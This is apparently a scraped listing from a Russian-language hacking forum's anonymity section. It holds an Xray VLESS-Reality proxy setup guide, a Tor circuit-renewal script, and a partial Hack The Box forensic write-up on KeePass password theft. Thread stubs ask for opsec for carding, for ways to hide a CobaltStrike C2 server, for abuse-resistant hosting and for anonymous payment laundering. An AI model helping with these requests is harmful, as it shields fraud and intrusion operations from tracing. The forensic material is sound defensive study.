{ "log": { "loglevel": "info" }, "routing": { "rules": [], "domainStrategy": "AsIs" }, "inbounds": [ { "port": 23, "tag": "ss", "protocol": "shadowsocks", "settings": { "method": "2022-blake3-aes-128-gcm", "password": "aaaaaaaaaaaaaaaabbbbbbbbbbbbbbbb", "network": "tcp,udp" } }, { "port": 443, "protocol": "vless", "tag": "vless_tls", "settings": { "clients": [ { "id": "4c3fe585-ac09-41df-b284-70d3fbe18884", "email": "user1@myserver", "flow": "xtls-rprx-vision" } ], "decryption": "none" }, "streamSettings": { "network": "tcp", "security": "reality", "realitySettings": { "show": false, "dest": "www.microsoft.com:443", "xver": 0, "serverNames": [ "www.microsoft.com" ], "privateKey": "GOTPj_klK7_j_IvjxiCtyBL80RYotYSOdBBBSfFOMH4", "minClientVer": "", "maxClientVer": "", "maxTimeDiff": 0, "shortIds": [ "aabbccdd" ] } }, "sniffing": { "enabled": true, "destOverride": [ "http", "tls" ] } } ], "outbounds": [ { "protocol": "freedom", "tag": "direct" }, { "protocol": "blackhole", "tag": "block" } ] }

На что обратить внимание: в "serverNames" указан домен, под сервер которого вы маскируетесь (в данном случае www.microsoft.com), "id" в секции "clients" - это тот самый UUID, что мы сгенерировали выше. "privateKey" и первый элемент в массиве "shortIds" - это приватный ключ и short ID, что мы тоже сгенерировали выше. Публичный ключ не теряйте, он будет нужен на клиенте.

В этом конфиге так же на 23 порту настроен Shadowsocks-2022, на всякий случай, вдруг пригодится. Если не надо, или хочется полной маскировки - можно удалить этот элемент из "inbounds".

Перезапускаем еще раз xray:

Code:Copy to clipboard

$ systemctl restart xray

Проверяем что все нормально запустилось:

Code:Copy to clipboard

$ journalctl -u xray

Например, XRay может ругнуться что не удается распарсить JSON-файл, обычно это связано с лишними запятыми в конце {} блока, в этом случае он укажет, на какой строке ошибка. Исправляем ошибки, перезапускаем еще раз, и переходим к настройке клиентов.

Настройка клиентов

Сначала Nekobox на десктопе (Windows, Linux, и есть неофициальные билды под MacOS).

Если вы раньше им не пользовались, нужно переключить его на использование движка sing-box, Preferences -> Basic Settings -> Core:

Идем в Server -> New profile и заполняем все вот так:

Address - IP-адрес вашего сервера, UUID - соответственно, UUID, SNI должен соответствовать домену, под который вы маскируетесь (один из списка "serverNames" из конфига сервера), uTLS - я выбираю Chrome (это маскировка клиента под обычный браузер), Reality Pbk - публичный ключ (не приватный, а второй, публичный), Reality Sid - shortId из конфига выше.

Сохраняем, кликаем правой кнопкой мыши на новый сервер в списке, жмем Start, и проверяем подключение выбрав там же Current Select -> URL test.

Если все нормально, то галочками "VPN Mode" или "System proxy" можно завернуть трафик всех приложений на прокси.

Настройка v2rayN под Windows аналогична, набор параметров тот же, вот скриншот (не мой, из гугла):

Автор Nekobox перестал собирать версии под macOS, поэтому я рекомендую использовать Wings X / FoXray. Настройки точно такие же.

Если вдруг вам нравятся Clash-based клиенты (например, Clash Verge под Windows, Linux, MacOS или для мобильных устройств), то нужно использовать ядро Clash.Meta и специальны конфиг для Clash. В случае с Clash Verge можно сделать так:

Settings -> Clash Core -> Выбрать Meta

Сохранить конфиг в какой-нибудь локальный файл:
clash-reality.yml

Code:Copy to clipboard

mode: global mixed-port: 7890 allow-lan: false log-level: info ipv6: true secret: '' external-controller: 127.0.0.1:9090 proxies: - name: vless-reality-vision type: vless server: xxx.xx.xx.xx # ваш IP port: 443 uuid: 4c3fe585-ac09-41df-b284-70d3fbe18884 # ваш UUID network: tcp tls: true udp: true flow: xtls-rprx-vision servername: www.microsoft.com # ваш фейковый домен reality-opts: public-key: kbITklNKTdfvB6e3xy97pTV7gjl3Z3irv246oRZ5Gnk # public key short-id: aabbccdd # short ID client-fingerprint: chrome

Profiles -> New - Type : Local -> выбрать ваш файл и кликнуть по нему в окне Clash

Proxies -> выбрать ваш новый прокси на вкладке Global -> кликнуть по полю справа чтобы протестировать подключение, должно появиться значение пинга

Settings -> System proxy: вкл - после этого трафик всей системы пойдет через прокси. Можно использовать и TUN, но для этого надо запускать Clash Verge от рута.

Далее, мобильные клиенты. Вариант раз: в Nekobox или в v2ray кликнуть правой кнопкой мыши на ваш сервер из списка, выбрать Share -> QR code или Link, и получить ссылку или QR-код, которые потом можно отсканировать/вставить в мобильные клиенты. Либо вбить все те же данные руками, вот как это выглядит в андроидовском v2rayNG (версия из Google Play еще не обновилась и не умеет работать с Reality, скачиваем APK с Гитхаба):
**
скриншоты**

Под iOS я рекомендую использовать Shadowrocket (3$) или Wings X / FoXray (он бесплатный). Настройки подключения полностью аналогичны описанному выше.

Советы бывалых

Очень рекомендуется настраивать на клиентах правила маршрутизации (пример в комментариях), чтобы трафик до .ru-доменов и хостов с российскими IP шел напрямую, а не через прокси (в клиентах для такого поставляется GeoIP база данных).

Обязательно используйте uTLS на клиентах, выставляя правильный TLS fingerprint (например, Chrome).
Если при использовании XTLS вы почему-то не можете подключиться, в логах сервера видна ошибка типа "failed to use xtls-rprx-vision, found outer tls version 771", попробуйте сменить версию uTLS. У меня, например, при выборе "android" клиент не подключается, а при выборе "chrome" все окей.

Для увеличения производительности можно настроить на сервере Bottleneck Bandwidth и Round-trip propagation time (BBR) congestion control algorithm:
echo "net.core.default_qdisc=fq" >> /etc/sysctl.conf
echo "net.ipv4.tcp_congestion_control=bbr" >> /etc/sysctl.conf
sysctl -p

Чтобы проверить, что маскировка работает как надо, добавьте IP-адрес вашего сервера и домен, под который вы маскируетесь, в hosts-файл (на Linux это /etc/hosts, на Windows это c:\windows\system32\drivers\etc\hosts), например, "38.25.63.10 www.microsoft.com", и после этого попробуйте зайти на этот адрес браузером - должна открыться настоящая страница этого домена с настоящим TLS-сертификатом:

Другой вариант: использовать CURL.
curl -v --resolve www.microsoft.com:443:151.101.65.69 https://www.microsoft.com (вместо 151.101.xx.xx должен быть IP вашего сервера)

автор MiraclePtr
источник habr.com

Как создать цепочку из нескольких Whonix Gateway?

ID: 676533bbb4103b69df371bd4
Thread ID: 54260
Created: 2021-07-21T23:10:54+0000
Last Post: 2021-07-22T12:12:50+0000
Author: chillco
Replies: 3 Views: 672

Здравствуйте. Хочу создать цепочку из нескольких тор сетей. Использую Whonix Gateway. Проблема в том, что ип и подсеть в whonix gateway захардкодили, как его изменить не знаю, и возможно ли это, не изменяя его вручную везде где только можно по всей системе.
Знаю, что некоторые используют цепочку из нескольких тор соединений. Как? И возможно ли это сделать в Whonix?

Подскажите бесплатный антидетект браузер.

ID: 676533bbb4103b69df371afc
Thread ID: 68930
Created: 2022-06-22T08:16:01+0000
Last Post: 2022-06-22T08:16:01+0000
Author: den nicolas
Replies: 0 Views: 669

Giuzeppe_hard said:

Собственно сабж, требуется >10 профилей, switch не подходит (сервер постоянно лежит), есть ли более менее свежие антидетекты? Можно бесплатный, можно крякнутый.

Click to expand...

Если нашел актуальный здесь ссылку оставь

Разница между анонимностью и приватностью

ID: 676533bbb4103b69df37193a
Thread ID: 121493
Created: 2024-08-26T16:11:51+0000
Last Post: 2024-08-27T02:59:43+0000
Author: PapaCarlo
Replies: 3 Views: 666

Анонимность и приватность – это два понятия, которые часто путают, но между ними есть важные различия. Давай разберёмся, что к чему, на пальцах.

Анонимность – это когда ты, грубо говоря, "прячешься в кустах". Твое лицо скрыто, имя неизвестно, и никто не может понять, кто ты такой.
Представь, что ты на вечеринке в маске – ты общаешься, веселишься, но никто не знает, кто ты на самом деле.
В интернете это работает примерно так же: ты можешь пользоваться псевдонимами, скрывать свой IP, использовать анонимные браузеры и вообще оставлять как можно меньше следов.

Приватность – это уже другая история. Здесь дело не в том, чтобы спрятаться, а в том, чтобы контролировать, что о тебе знают и кто эту информацию видит. Ты можешь быть без маски, но при этом не хочешь, чтобы каждый прохожий видел, что у тебя в телефоне, читал твои сообщения или знал, где ты был на прошлых выходных. Это про то, чтобы иметь возможность закрыть дверь и не пустить туда, кого не хочешь.

Так что анонимность – это скорее про сокрытие своей личности, а приватность – про контроль над личной информацией. Оба понятия важны, но защищают они разные аспекты твоей жизни. Важно понимать эту разницу, чтобы знать, когда и что тебе нужно в конкретной ситуации.

are two disks in the computer a good idea?

ID: 676533bbb4103b69df371bd7
Thread ID: 54053
Created: 2021-07-15T19:51:12+0000
Last Post: 2021-07-17T09:11:56+0000
Author: Zakodowany
Replies: 4 Views: 663

Hello!
I have a question, I have a computer with two disks, Windows on one, and Linux encrypted on the other.
Is it a safe solution?

JavaScript enabled over Tor

ID: 676533bbb4103b69df371b5e
Thread ID: 61367
Created: 2022-01-13T23:12:35+0000
Last Post: 2022-01-14T01:08:18+0000
Author: Azuret-Calyx
Replies: 5 Views: 662

Hello there,

I dont know so much about this vulnerability but on my journey i get some minimal information but basically is JavaScript dangerous when you know how use it
before i was get banned on Dread i ask on /OPSec about how really is JavaScript is dangerous

and almost 85% people write its not so much dangerous but they maybe troll me or i am just paranoid
i now specified what they told me - Cannot leak your home IP address over vpn
- Possible to leak WebGL ( so they get max your GPU card,resolution and etc ? )

Thanks for explain me problem and your time ( more simply means more better for me,hah )

Как организовать анонимное получение денег в телеге за услуги?

ID: 676533bbb4103b69df371b36
Thread ID: 63403
Created: 2022-02-23T15:15:11+0000
Last Post: 2022-03-12T05:43:50+0000
Author: Longinus17
Replies: 14 Views: 658

Здравствуйте.
Собственно вопрос..... За некие услуги со мной будут расплачиваться клиенты. Общение с клиентами идет в телеграм.
Как организовать анонимное получение средств в тележке? Расплачиваться будут с пластиковых карт, PayPal и биткоинами.
Надеюсь, есть один сервис, который принимает оплату всеми нужными способами, конвертирует всё в btc и ложит в один кошелёк.

И следом вопрос номер два.
Кошелёчек с биточками - это, конечно, чудесно. Но как то нужно что бы денежки оказались на VISA, которая в кармашке. Тут тоже для меня тёмный лес. Конвертировать и выводить на свою карту - не палевно ли? Речь идет о суммах около 200к в месяц. Это в рублях, не в btc. )

Анонимные файлообменники, обсуждение

ID: 676533bbb4103b69df37198d
Thread ID: 110490
Created: 2024-03-15T19:26:38+0000
Last Post: 2024-03-24T10:42:50+0000
Author: DedJhones
Replies: 11 Views: 658

Посоветуйте анонимный файлообменник

Или как максимально анонимно закинуть файл на rdp

Файл 500мб+

Где безопасно(приватно) хранить исходный код программ?

ID: 676533bbb4103b69df371bd0
Thread ID: 54513
Created: 2021-07-28T12:56:38+0000
Last Post: 2021-07-29T19:32:16+0000
Author: Vodoley
Replies: 9 Views: 658

Здравствуйте.
Я разработчик. Использую Git, но пока только локально. Хочу использовать удаленный сервер для хранения исходников, так как это удобнее.
Всегда знаешь что есть удаленная копия, не боясь потерять локальные данные. Но насколько безопасно хранить исходный код программ на тех же GitHub, GitLab, Bitbucket?
Бывали ли такие случаи когда исходный код утекал по вине хостинга? Как Вы сами храните исходный код программ?
Буду рад любому совету!

Wireguard на Linux, общая тема

ID: 676533bbb4103b69df371922
Thread ID: 123910
Created: 2024-10-01T16:07:27+0000
Last Post: 2024-10-05T11:43:19+0000
Author: Jim0x
Replies: 7 Views: 656

Всех приветствую, прозвучит глупый вопрос скорее всего не сталкивался с данной проблемой потому что не было надобности ставить клиент + запуск wireguard на линукс и подключение к впн, собственно подскажите имел ли опыт кто нибудь с таким?
Как поставить клиент wireguard gui допустим на linux и подключится к впн но что бы не слетало соединение с рдп. Спасибо за помощь, с меня "конфетка" ($) ))

ㅤ

ID: 676533bbb4103b69df371b18
Thread ID: 65004
Created: 2022-03-30T02:10:03+0000
Last Post: 2022-05-02T17:32:55+0000
Author: pmk
Replies: 13 Views: 652

ㅤ

Keeping my C2 server anonymous, how can I do this?

ID: 676533bbb4103b69df371b2a
Thread ID: 64336
Created: 2022-03-16T16:39:18+0000
Last Post: 2022-04-01T12:06:22+0000
Author: kitsunefx
Replies: 17 Views: 652

Hi,

I've got a CobaltStrike C2 set up and I want to know what's the best way to keep it anonymous so nobody can track it down, how would I do this?
I'm quite new so please forgive me if this is a dumb question.

All advice helpful

Practical Memory Forensics: Jumpstart effective forensic analysis of volatile memory (2022)

ID: 676533bbb4103b69df371b2f
Thread ID: 64484
Created: 2022-03-19T09:27:11+0000
Last Post: 2022-03-19T09:27:11+0000
Author: x00c4sub
Prefix: Мануал/Книга
Replies: 0 Views: 651

Memory Forensics is a powerful analysis technique that can be used in different areas, from incident response to malware analysis. With memory forensics, you can not only gain key insights into the user's context but also look for unique traces of malware, in some cases, to piece together the puzzle of a sophisticated targeted attack.

Starting with an introduction to memory forensics, this book will gradually take you through more modern concepts of hunting and investigating advanced malware using free tools and memory analysis frameworks. This book takes a practical approach and uses memory images from real incidents to help you gain a better understanding of the subject and develop the skills required to investigate and respond to malware-related incidents and complex targeted attacks. You'll cover Windows, Linux, and macOS internals and explore techniques and tools to detect, investigate, and hunt threats using memory forensics. Equipped with this knowledge, you'll be able to create and analyze memory dumps on your own, examine user activity, detect traces of fileless and memory-based malware, and reconstruct the actions taken by threat actors.

By the end of this book, you'll be well-versed in memory forensics and have gained hands-on experience of using various tools associated with it.

-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

Экспертиза памяти - это мощный метод анализа, который можно использовать в различных областях, от реагирования на инциденты до анализа вредоносного ПО. С помощью экспертизы памяти можно не только получить ключевые сведения о контексте пользователя, но и найти уникальные следы вредоносного ПО, а в некоторых случаях собрать воедино головоломку сложной целенаправленной атаки.

Начиная с введения в криминалистику памяти, эта книга постепенно проведет вас через более современные концепции поиска и расследования современных вредоносных программ с использованием бесплатных инструментов и фреймворков анализа памяти. В книге применяется практический подход и используются образы памяти из реальных инцидентов, чтобы помочь вам лучше понять предмет и развить навыки, необходимые для расследования и реагирования на инциденты, связанные с вредоносным ПО, и сложные целенаправленные атаки. Вы узнаете о внутреннем устройстве Windows, Linux и macOS и изучите методы и инструменты для обнаружения, расследования и преследования угроз с помощью экспертизы памяти. Вооружившись этими знаниями, вы сможете самостоятельно создавать и анализировать дампы памяти, исследовать действия пользователей, обнаруживать следы вредоносных программ без файлов и в памяти, а также реконструировать действия, предпринятые субъектами угроз.

К концу этой книги вы будете хорошо разбираться в экспертизе памяти и получите практический опыт использования различных инструментов, связанных с ней.

[ Practical_Memory_Forensics_Jumpstart_effective_forensic_analysis.pdf

](https://cloud.mail.ru/public/UNTp/NxxEFuJcQ)

Вам открыли доступ к файлу. Отправлено с помощью Облако Mail

cloud.mail.ru

Practical Forensic Analysis of Artifacts on iOS and Android Devices: Investigating Complex Mobile Devices (2022)

ID: 676533bbb4103b69df371b21
Thread ID: 65747
Created: 2022-04-17T15:34:31+0000
Last Post: 2022-04-18T10:17:58+0000
Author: x00c4sub
Prefix: Мануал/Книга
Replies: 1 Views: 651

Вы пройдете различные этапы процесса мобильной криминалистики для устройств на базе Android и iOS, включая криминалистическое извлечение, сбор и анализ данных, а также подготовку и распространение отчетов. Практические примеры и лабораторные работы с использованием специализированного оборудования и программного обеспечения иллюстрируют практическое применение и выполнение сбора данных (включая удаленные данные) и анализа извлеченной информации. Вы также получите продвинутое понимание компьютерной криминалистики, сосредоточившись на мобильных устройствах и других устройствах, не классифицируемых как ноутбуки, настольные компьютеры или серверы.

i2p - для тех кто хотел разобраться, но ничего не понял

ID: 676533bbb4103b69df371a2d
Thread ID: 93566
Created: 2023-07-21T09:32:49+0000
Last Post: 2023-08-08T07:24:43+0000
Author: Mikeclover
Replies: 7 Views: 648

Сегодня я не буду повторяться за другими авторами и в очередной раз рассказывать о том, что такое i2p и с чем его едят. Вместо этого мы с вами рассмотрим один из примеров практического применения этой сети для сохранения анонимности обычного пользователя.
Но для начала хочу выразить благодарность человеку https://habr.com/ru/users/pureacetone/ По его статьям вы можете сами понять почему. Также, одну из его картинок я скопирую сюда. Именно она стала решающей для начала изучения вопроса.

Статья будет посвящена тому, как использовать TELEGRAM через сеть i2p как на мобильных устройствах, так и на десктопе и будет носить больше практический характер направленный в первую очередь на новичков.
Давайте по порядку. Во-первых, проект жив и развивается. Скачать i2pd (I2P Daemon) можно с https://i2pd.website/. Здесь присутствуют ссылки на версии под различные платформы.
Во-вторых, как пример, мы рассмотрим установку и настройку демона на ОС Ubuntu 20.04.6 и Android.
В-третьих, запуск web клиента telegram как на той, так и на другой ОС будет аналогичен.

1. Для Ubuntu 20.04.6 необходимо скачать i2pd_2.48.0-1focal1_amd64.deb и установить в системе командой sudo dpkg -i i2pd_2.48.0-1focal1_amd64.deb Система ругнется на зависимости, но все фиксится просто командой sudo apt --fix-broken install . После просто запусить БЕЗ прав суперпользователя i2pd. Демон забиндит в системе 2 порта 4444 (для http)и 4447 (для SOCKS5). Остается только настроить свой браузер для доступа к ресурсам i2p, в нашем случае firefox:

2. Для Android необходимо скачать приложение в зависимости о архитектуры, в нашем случае [i2pd-2.48.0.1-armeabi-v7a-release.apk](https://github.com/PurpleI2P/i2pd- android/releases/download/2.48.0.1/i2pd-2.48.0.1-armeabi-v7a-release.apk)

Здесть токже необходимо выбрать http и SOCKS5 при запуске. Для firefox и других браузер необходимо скачать дополнение FoxyProxy https://addons.mozilla.org/en-US/firefox/addon/foxyproxy-standard/ и настроить его по аналогии со скрином для десктопной версии.

3. После небольшого времени ожидания (необходимо для запуска сети, порядка минуты) нам становятся доступны ресурсы скрытой сети. Не буду останавливаться на адресации и регистрации доменов, а сразу запустим web клиента telegram, на сегодняшний день он доступен к примеру по адресу https://web.telegram.i2p (соответсвенно, выход из скрытой сети предоставлен пользователем и никто не запрещает сделать для себя отдельный).

Далее все как всегда, заходим-пользуемся)))

Вопросы безопасности можем рассмотреть в комментах, а пока считаю, что слегка забытый i2p является хорошей альтернативой Tor или VPN когда надо просто скрыть от телеграма и остальных "майоров" откуда ты в него заходишь. Разворачивается быстро, для повседневной переписки рабочей более чем. https://www.makeuseof.com/tag/i2p-vs-tor-vs-vpn-secure/

Подскажите абузоустойчивый хостинг и регистратор доменов

ID: 676533bbb4103b69df371ba4
Thread ID: 56568
Created: 2021-09-11T14:40:37+0000
Last Post: 2021-09-17T18:00:59+0000
Author: Gateway
Replies: 15 Views: 648

Добрый день,подскажите пожайлуста абузоустойчивых регистраторов доменных имен а так же хостинги,желательно проверенных временем
Заранее спасибо!

Обновляем цепочку тора без перезагрузки.

ID: 676533bbb4103b69df371ae4
Thread ID: 69857
Created: 2022-07-09T09:43:47+0000
Last Post: 2022-08-05T07:21:40+0000
Author: peacemaker
Prefix: Мануал/Книга
Replies: 2 Views: 645

Иногда требуется изменить цепочку тора, без перезагрузки сервиса.

Идем в /etc/tor/torrc

ControlPort 9051
HashedControlPassword 16:872860B76453A77D60CA2BB8C1A7042072093276A3D701AD684053EC4C
CookieAuthentication 1

Click to expand...

Добавляем эти строчки или убираем комментарий с них.

И заменяем хэш пароля на свой.

tor --hash-password NEW_PASS
Где NEW_PASS ваш пароль.

Теперь пишем простенький скрипт. Создаем файл /usr/local/bin/tor-renew

Даем права на запуск
chmod +x /usr/local/bin/tor-renew
Содержимое файла. Замените NEW_PASS на ваш пароль.

Bash:Copy to clipboard

#!/bin/bash echo "Generate new IP" echo -e 'AUTHENTICATE "NEW_PASS"\r\nsignal NEWNYM\r\nQUIT' | nc 127.0.0.1 9051 sleep 5 echo "Successful!"

Теперь выполняя команду tor-renew у вас будет генерироваться новая цепочка.

Autosploit следит за вами

ID: 676533bbb4103b69df371c5d
Thread ID: 46653
Created: 2021-01-12T20:10:36+0000
Last Post: 2021-01-12T20:10:36+0000
Author: XLino
Replies: 0 Views: 644

" Need to gather your OS information, current arguments, the error message, and a traceback. None of this information can be used to identify you in any way"

Безопастность в кардинге | как оставаться в тени и лутать бабос?

ID: 676533bbb4103b69df371a1c
Thread ID: 96638
Created: 2023-08-26T21:46:07+0000
Last Post: 2023-08-27T17:19:59+0000
Author: forslll
Replies: 11 Views: 643

Хочу начать кардить вещевуху сс боа, сам в ЕС живу , какие лучше использовать связки и как добиться максимальной анонимности? Менять прокси\впн то понятно , может так-же железо\провайдера\симки? Посеветуйте где можно найти обсуждения на подобные темы с разными вариантами? Есть вообще реально анонимные прокси\впн, какие можете посоветовать?

параллельный тор

ID: 676533bbb4103b69df37190c
Thread ID: 126112
Created: 2024-11-03T05:00:37+0000
Last Post: 2024-11-10T16:35:20+0000
Author: GenGenra
Replies: 2 Views: 638

Приветствую всех участников форума. В одной из тем в прошлом я видел упоминание технологии параллельного подключения в сети тор. В то время как тор славится своей низкой пропуской способностью технология предлагает параллельный запуск нескольких тор соединений и автоматической балансировки траффика между ними. Может кто-то знает названия или аналоги этой технологии? Спасибо

Радиоразведка Америки. Перехват информации. Вадим Гребенников

ID: 676533bbb4103b69df371b15
Thread ID: 66509
Created: 2022-05-03T07:05:14+0000
Last Post: 2022-05-03T07:05:14+0000
Author: camawe
Prefix: Мануал/Книга
Replies: 0 Views: 636

[ Радиоразведка Америки. Перехват информации. Вадим Гребенников.pdf -

AnonFiles ](https://anonfiles.com/530dA4c3ya/.._pdf)

anonfiles.com

подскажите мануал по настройке дабл впн

ID: 676533bbb4103b69df371b73
Thread ID: 58856
Created: 2021-11-14T09:17:29+0000
Last Post: 2021-12-13T19:38:00+0000
Author: luckynumber
Replies: 12 Views: 636

всем доброго
долго искал по сайту и гуглу но не смог найти никакого мануала по настройке дабл впн
ткните пож естли ктото видел..

Вопросы по onion

ID: 676533bbb4103b69df371cb2
Thread ID: 40455
Created: 2020-08-04T20:38:41+0000
Last Post: 2020-08-04T20:38:41+0000
Author: Pinus
Replies: 0 Views: 635

http://xssforumv3isucukbxhdhwz67hoa5e2voakcfkuieq4ch257vsburuid.onion/threads/40273
Дайте пожалуйста ответ на вопросы.
Модераторам: прошу простить за несколько тем.
Постинг тут не быстрый и ответов на не такие и сложные вопросы я жду уже несколько дней.
На некоторые я частично нашел ответ, но нужны дополнения от тех, кто знаком на практике.

На сколько безопасно проброс портов через ngrok или ssh tunel

ID: 676533bbb4103b69df371a0d
Thread ID: 97290
Created: 2023-09-04T18:22:18+0000
Last Post: 2023-09-09T05:24:44+0000
Author: cyber_ftz
Replies: 8 Views: 635

Привет! Иногда бывает нужно пробросить порты для бэк коннекта, но пока не разобрался на сколько безопасно в плане анонимности проброс портов через ngrok или ssh tunel. Тестирую сайты через тор но когда дело доходит до какого нибудь бэк коннекта не знаю что делать. Да самый лучший способ купить какой нибудь сервак но есть ли другие способы ? или в большинстве случаев можно обойтись с ssh или ngrok?

Уроки форензики. Расследуем кражу паролей KeePass на примере HTB Hunter

ID: 676533bbb4103b69df371950
Thread ID: 117061
Created: 2024-06-17T22:30:36+0000
Last Post: 2024-06-17T22:30:36+0000
Author: tabac
Prefix: Статья
Replies: 0 Views: 634

Сегодня в рамках расследования инцидента мы с тобой проэксплуатируем уязвимость в KeePass, найденную в 2023 году, а затем посмотрим, как использовать инструмент ZUI для анализа артефактов.

Нам предстоит пройти задание Hunter c ресурса Hack The Box Sherlocks. Его уровень сложности — «безумный». Мы не будем давать готовых ответов на вопросы в задании. Вместо этого сосредоточимся на процессе расследования, чтобы ты мог при желании повторить его сам и подсмотреть в эту статью, если вдруг зайдешь в тупик.

В описании к инциденту сказано:

Аналитик SOC получил предупреждение о возможных атаках lateral movement и credential stuffing. После анализа алерт был подтвержден. У сетевого сенсора были проблемы с производительностью, поэтому захвачен не весь трафик.

Click to expand...

Для анализа даны:

дамп трафика;

архив с артефактами хоста, собранный утилитой KAPE.

В процессе анализа заполним карточку инцидента и составим Incident Response Plan (IRP) в IRIS.

СОБИРАЕМ ИНФОРМАЦИЮ О СИСТЕМЕ

Для получения информации oб имени анализируемого хоста воспользуемся утилитой [Hayabusa](https://github.com/Yamato-Security/hayabusa?tab=readme-ov- file#computer-metrics-command):

Code:Copy to clipboard

./hayabusa computer-metrics --rules-config ../config/ -d ~/C/

Утилита проанализирует события журналов Windows и предложит несколько вариантов, с частотой их упоминания:

Forela-Wkstn002.forela.local — 97 385 упоминаний;

DESKTOP-H72HB4B — 6861 упоминание;

Forela-Wkstn002 — 6087 упоминаний;

FORELA-WKSTN002 — 4 упоминания.

Можем предположить, что имя DESKTOP-H72HB4B было до ввода машины в домен.

Больше информации мы получим из реестра, для этого воспользуемся утилитой RegRipper3.0 и плагинами.

winver

Ветка реестра:

Code:Copy to clipboard

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\

Команда:

Code:Copy to clipboard

regripper -p winver -r CONFIG

Вывод:

Code:Copy to clipboard

ProductName Windows 10 Pro N ReleaseID 2009 BuildLab 19041.vb_release.191206-1406 BuildLabEx 19041.1.amd64fre.vb_release.191206-1406 CompositionEditionID EnterpriseN RegisteredOrganization RegisteredOwner CyberJungle InstallDate 2023-03-07 13:14:17Z InstallTime 2023-03-07 13:14:17Z

networklist

Ветка реестра:

Code:Copy to clipboard

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles\ProfileName\

Команда:

Code:Copy to clipboard

regripper -p networklist -r CONFIG

Вывод:

Code:Copy to clipboard

Network 2 Key LastWrite : 2023-06-21 11:17:27Z DateLastConnected: 2023-06-21 16:17:27 DateCreated : 2023-04-12 21:20:50 DefaultGatewayMac: 00-50-56-EE-C1-2F Type : wired forela.local Key LastWrite : 2023-06-21 11:47:27Z DateLastConnected: 2023-06-21 16:47:27 DateCreated : 2023-03-08 03:25:47 DefaultGatewayMac: 00-50-56-EB-C1-1A Type : wired Network Key LastWrite : 2023-04-12 09:16:14Z DateLastConnected: 2023-04-12 14:16:14 DateCreated : 2023-03-07 17:51:47 DefaultGatewayMac: 00-50-56-EB-C1-1A Type : wired Domain/IP forela.local

compname

Ветка реестра:

Code:Copy to clipboard

HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\

Команда:

Code:Copy to clipboard

regripper -p compname -r SYSTEM

Вывод:

Code:Copy to clipboard

ComputerName = forela-wkstn002 TCP/IP Hostname = Forela-Wkstn002

ips

Ветка реестра:

Code:Copy to clipboard

HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces

Команда:

Code:Copy to clipboard

IPAddress 172.17.79.131

Результаты:

домен — forela.local;

хост — forela-wkstn002;

IP — 172.17.79.131.

Добавляем все найденное в IRIS.
![](/proxy.php?image=https%3A%2F%2Fstatic.xakep.ru%2Fimages%2F6b6d0518d6d64eed4a1d43da69f9c20d%2F36139%2Firis- add-asset.png&hash=4a34db9ec56cb70f6b1468c13d7fb738)

АНАЛИЗИРУЕМ ФАЙЛ PCAP

Анализ артефактов хоста, безусловно, дает огромное количество информации о произошедших событиях, но я начал с просмотра трафика, чтобы понять, какие взаимодействия были с анализируемой машиной.

Для анализа PCAP-файла я использовал ZUI и Wireshark.

Начнем с алертов сигнатур опенсорсной IDS Suricata.
![Алерты Suricata](/proxy.php?image=https%3A%2F%2Fstatic.xakep.ru%2Fimages%2F6b6d0518d6d64eed4a1d43da69f9c20d%2F36146%2Fsuricata- alers.png&hash=9858f01508fec2c2192f9fdb896124aa)
В глаза бросается использование Kali Linux, о чем говорит вот эта сигнатура:

Code:Copy to clipboard

ET POLICY Possible Kali Linux hostname in DHCP Request Packet

Найдем информацию об использовании DCHP:

Code:Copy to clipboard

_path=="dhcp" | select ts, client_addr, server_addr, mac, host_name, client_fqdn, domain, assigned_addr

В 11:31:18 21 июня 2023 года хосту kali назначен IP 172.17.79.133. Добавим это в таймлайн IRIS.
![Использование DHCP](/proxy.php?image=https%3A%2F%2Fstatic.xakep.ru%2Fimages%2F6b6d0518d6d64eed4a1d43da69f9c20d%2F36142%2Fdhcp- info.png&hash=ec80dd300683c87eb1b76ab45e08930c)
Также мы видим, что в широковещательном домене есть следующие хосты:

172.17.79.131 — Forela-Wkstn002.forela.local (анализируемый нами хост);

172.17.79.132 — DESKTOP-887GK2L.

Посмотрим, с кем взаимодействовал Forela-Wkstn002.forela.local (172.17.79.131). Для начала сделаем сортировку по тегам.

![Статистика по тегам](/proxy.php?image=https%3A%2F%2Fstatic.xakep.ru%2Fimages%2F6b6d0518d6d64eed4a1d43da69f9c20d%2F36138%2Fstat- forela.png&hash=19d31e385c35860998bc0e090fa4425c)

FTP

Посмотрим тег ftp:

Code:Copy to clipboard

fuse | 172.17.79.131 | _path=="ftp" | sort -r ts

Увидим сетевые взаимодействия с FTP-сервером 13.235.18.128.

Давай подробнее посмотрим в Wireshark:

Code:Copy to clipboard

ftp || ftp-data

Обнаружим авторизацию на FTP-сервере.
![Авторизация по протоколу FTP](/proxy.php?image=https%3A%2F%2Fstatic.xakep.ru%2Fimages%2F6b6d0518d6d64eed4a1d43da69f9c20d%2F36137%2Fftp- wireshark-auth.png&hash=1063ba72ecdc724aae827f0888ec07a7)

Посмотрим, какие файлы эксфильтровал злоумышленник, и сохраним их.
![Эксфильтрованные файлы](/proxy.php?image=https%3A%2F%2Fstatic.xakep.ru%2Fimages%2F6b6d0518d6d64eed4a1d43da69f9c20d%2F36136%2Fexport- files.png&hash=da04e047578dde18f8ffa8ab2f79217c)
Время сетевого взаимодействия: 12:20:16.012196 — 12:23:04.994762. Набор файлов keepassproc.zip и Database.kdbx указывает на то, что хакер мог извлечь пароли из базы данных, используя уязвимость CVE-2023-32784.

SMB

Посмотрим сетевые соединения тeг conn:

Code:Copy to clipboard

fuse | 172.17.79.131 | _path=="conn"

![События с тегом conn](/proxy.php?image=https%3A%2F%2Fstatic.xakep.ru%2Fimages%2F6b6d0518d6d64eed4a1d43da69f9c20d%2F36135%2Fconn- smb.png&hash=834c1a4bf749bfd531b1a24be0acdada)

Мы видим сессии от kali (172.17.79.133) к Forela-Wkstn002.forela.local (172.17.79.131) по 445-му порту (SMB). Эта сессия не была отнесена анализатором к SMB (вспоминаем, что захвачен был не весь сетевой трафик). Перейдем в Wireshark.

